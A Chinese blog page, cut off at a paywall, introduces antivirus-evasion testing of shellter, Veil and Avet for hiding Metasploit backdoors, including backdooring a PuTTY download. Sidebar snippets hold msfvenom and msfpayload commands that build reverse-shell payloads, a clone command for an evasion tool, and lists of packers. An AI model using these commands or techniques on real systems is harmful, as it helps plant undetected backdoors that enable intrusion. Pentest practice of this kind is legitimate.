【免杀测试】Kali之Metasploit几款工具免杀练习

最新推荐文章于 2025-06-12 20:14:11 发布
最新推荐文章于 2025-06-12 20:14:11 发布
阅读量1.2w 收藏 126
点赞数 14
CC 4.0 BY-SA版权
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SecSF/article/details/79036833
本文测试了三种免杀工具:shellter、Veil和Avet,评估其绕过杀毒软件的能力。通过实验发现Avet表现最佳,但也未能完全避免被检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  余磊 

不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。

下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil,  Avet


01

shellter

Shellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。它是生成一个dll文件再将其注入到任意一个文件中运行。

首先我们需要安装shellter

这里我从百度下载一个putyy来进行测试,把它放在/root/目录下

 打开shellter,根据提示制作很简单,经过一番设置

制作好了,先看下能不能使用

最低0.47元/天 解锁文章

200万优质内容无限畅学
kali使用Metasploit进行渗透攻击
lhf13036943631的博客
05-06 1068
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
工具必备
05-10
不错的工具哦 在这里先上传一个 还有的会再传的
如此简单!从零基础到精通,收藏这篇就够了
QIANDXX的博客
05-11 1235
还在红蓝对抗里苦苦挣扎?就像那 elusive 的独角兽,永远在远方召唤你?别慌!今天就给大家伙儿介绍一款的神器——MaLoader,让你也能体验一把“”的快感!MaLoader这玩意儿可不是吃素的,它是一款基于打造的马生成工具。目前战绩彪炳,,统统不在话下!简直是软界的“本文仅用于技术交流,请勿用于非法用途。如因操作不当导致“”的悲剧发生,本人概不负责!
工具工具工具工具
05-24
工具工具工具工具工具工具
如此简单!从零基础到精通,收藏这篇就够了!
最新发布
A1_3_9_7的博客
06-12 587
还在红蓝对抗里苦苦挣扎?就像那 elusive 的独角兽,永远在远方召唤你?别慌!今天就给大家伙儿介绍一款的神器——MaLoader,让你也能体验一把“”的快感!MaLoader这玩意儿可不是吃素的,它是一款基于打造的马生成工具。目前战绩彪炳,,统统不在话下!简直是软界的“本文仅用于技术交流,请勿用于非法用途。如因操作不当导致“”的悲剧发生,本人概不负责!
工具 -- FourEye
Web安全工具库
01-12 7552
今天有一点想你,其实,不止一点,其实,不止今天。。。 ​----网易云热评 一、简介 快速生成exe可执行文件,目前拥有三种的方法 二、下载及安装 1、下载到本地 git clonehttps://github.com/lengjibo/FourEye.git 2、进入该文件夹 cd FourEye 3、安装需要的python库 pip install -r requirements.txt 三、使用方法 1、打开该软件 python3 Byp...
Metasploit
PortugalCR7的博客
06-29 802
本次实验中不管是利用msf中的编码器进行编码还是用加壳脚本,目的都是要绕过Windows系统的查,但还是不能够逃过毒系统的检测,故还是要寻找更好的方式来进行。把cr7.exe放入靶机中运行(成功)(毒软件报毒)利用msf自带编码器进行编码。利用msf自带编码器进行编码
工具
02-21
工具
一些工具
5L2g556F5ZWl77yf
11-07 3661
一些工具,shellcode,webshell
Kali Linux渗透测试实战:安装与Metasploit应用
1. 安装Kali Linux 2017.1版本,这是一款专门用于渗透测试的操作系统。 2. 搭配一个Windows 7/XP系统,以便了解不同环境下的网络行为。 3. 安装Metasploit框架,这是一个强大的渗透测试平台。 4. 准备一个无线网卡,...
Kali Linux渗透测试实战指南:从安装到Metasploit应用
Kali Linux是一款专为网络安全和渗透测试设计的操作系统,源于Debian并由Offensive Security维护。它整合了大量的渗透测试和安全评估工具,允许用户通过系统更新获取最新工具,是专业人士进行安全测试的首选平台。...
工具--veil-evasion
11-21
这个东西下了好久的,用过都知道GitHub下载死慢的,就分享出来赚点积分吧
强大的工具,绝对震撼你!!!!
09-09
exe转jpg的工具,而且右键看属性也是jpg格式的,可别做坏事啊!!
工具箱 简体中文版
02-24
辅助 ┍PE+ ┝MyCCL ┝MaskPE ┝冰枫文件防火墙 ┝AVFucker ┝AV Devil ┝ToPo ┝CodeCaver ┝Anti Kaspersky ┝TK.Loader ┝INSTDRV ┝DriverLoader ┝vmprotect ┕VBExplorer 保护壳 ┍BepGui ┝Cryptor ┝PolyBox ┝ASProtect ┝Punisher 汉化版 ┝ACStripper ┝PE加密 ┝Daemon Crypt ┝nsAnti CracKed ┝RPolyCrypt ┝Goat's PE Mutilator ┝Unknown Protect ┕EXE Stealth 压缩壳 ┍堀北压缩 ┝Minkecn ┝WinUpack ┝petgui_CHS ┝蚂蚁压缩工具 ┝超级加壳工具 ┝Nspack ┝FSG ┝GHF Protector ┝dePack ┝G!X Protector ┕eXPressor 花指令 ┍wrsky ┝防精灵 ┝花指令生成器 ┝超级加花器 ┝main ┝木马疫器 ┝上兴应用程序加壳 ┝冰枫文件加密器 ┝木马保护器 ┝8way ┝花指令添加器 ┝EXE Evil ┝木马彩衣 ┝F ake Ninja ┕━━━━━━━━━━━
中国骇客同盟专用工具
01-21
中国骇客同盟专用工具
Metasploit——木马
12-01 339
1.生成简单到木马后门 root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp O //查看这个payload有什么选项 root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.16...
Metasploit(msf)系列-木马
chaojixiaojingang
10-10 9494
    木马文件风险高,想要需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 原理:        首先生成木马文件,然后将生成的木马文件与shellter工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。 准备: 靶    机:WinXP系统  ip:192.168.1.10...
Metasploit初探索
mingyqf的博客
12-05 477
Metasploit初探索 转载链接:https://zhuanlan.zhihu.com/p/222968474 安全狗 安全狗 领先的云安全服务与解决方案提供商 2 人赞同了该文章 0x01 环境搭建 测试系统:windows10 (1909) 毒软件:360安全卫士 在线毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值